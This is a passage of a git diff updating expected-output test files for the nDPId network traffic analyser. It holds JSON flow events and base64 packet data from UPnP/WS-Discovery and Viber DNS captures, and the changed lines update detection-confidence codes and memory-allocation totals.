01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1541515314944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515314944,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUmVzb2x2ZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozZjQyZGM5YS0yNGNlLTQ4ZDEtODhmOS0xNmI5NmExMzdkNzE8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UmVzb2x2ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDplMzI0ODAwMC04MGNlLTExZGItODAwMC0wMDFiYTk5ZWM5NTY8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOlJlc29sdmU+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1541515315006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515315006,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtcAAAERvoXAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} 01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1541515315178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515315178,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUmVzb2x2ZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozZjQyZGM5YS0yNGNlLTQ4ZDEtODhmOS0xNmI5NmExMzdkNzE8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UmVzb2x2ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDplMzI0ODAwMC04MGNlLTExZGItODAwMC0wMDFiYTk5ZWM5NTY8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOlJlc29sdmU+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1541515315356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515315356,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtgAAAERvoTAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":9184,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1541515321472} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870853 bytes -~~ total memory freed........: 5870853 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6004487 bytes +~~ total memory freed........: 6004487 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1343 chars diff --git a/test/results/viber.pcap.out b/test/results/viber.pcap.out index 854a271ba..b03f5487d 100644 --- a/test/results/viber.pcap.out +++ b/test/results/viber.pcap.out @@ -4,90 +4,92 @@ 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1527155638474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155638474,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHQZAAEARnDbAqAARwKgAD7KvADUALIZ64YMBAAABAAAAAAAABWdyYXBoCGZhY2Vib29rA2NvbQAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1527155638476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1527155638476,"pkt":"MAdNo1+nAA6OMNv9CABFAAC9W3xAAEARXUPAqAAPwKgAEQA1sq8AqYax4YOBgAABAAMAAgACBWdyYXBoCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAK\/QAGA2FwacASwDAABQABAAADcAAMBHN0YXIEYzEwcsASwEIAAQABAAAAIgAEHw1WCMBHAAIAAQAAChUABwFiAm5zwEfARwACAAEAAAoVAAQBYcBswH0AAQABAAAKFQAERavvC8BqAAEAAQAAChUABEWr\/ws="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1527155639005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639005,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8HWBAAEARm+DAqAARwKgAD4nTADUAKI8By5wBAAABAAAAAAAAA2FwcAZhZGp1c3QDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1527155639008,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1527155639008,"pkt":"MAdNo1+nAA6OMNv9CABFAAEhW4BAAEARXNvAqAAPwKgAEQA1idMBDcumy5yBgAABAAQABAAEA2FwcAZhZGp1c3QDY29tAAABAAHADAABAAEAAAHMAASyots6wAwAAQABAAABzAAEsqLbmcAMAAEAAQAAAcwABLKi2LPADAABAAEAAAHMAAS5l8wIwBAAAgABAAKIXQATBG5zMDEGYWRqdXN0BXdvcmtzAMAQAAIAAQACiF0AFARkbnMxA3AwOQVuc29uZQNuZXQAwBAAAgABAAKIXQAHBGRuczLAkMAQAAIAAQACiF0ABwRuczAywHHAiwABAAEAAWUPAATGMywJwKsAAQABAAFlDwAExjMtCcBsAAEAAQAAMG8ABC02EQHAvgABAAEAADBvAAQtNhFB"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1527155639234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155639234,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHWRAAEARm9jAqAARwKgAD\/WYADUALODJ\/WMBAAABAAAAAAAABG1hcGkJYXBwdGltaXplA2NvbQAAAQAB"} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 